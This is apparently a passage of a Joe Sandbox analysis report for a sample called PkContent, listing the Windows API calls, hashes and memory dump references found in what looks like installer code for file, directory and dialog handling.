                                                • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                APIs
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID:
                                                • API String ID: 4115351271-0
                                                • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                APIs
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                • DeleteObject.GDI32(?), ref: 00404A79
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                • ShowWindow.USER32(00000000), ref: 00404F5B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $ @$M$N
                                                • API String ID: 1638840714-3479655940
                                                • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                APIs
                                                • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                • SetWindowTextW.USER32(?,?), ref: 00404583
                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                  • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                  • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
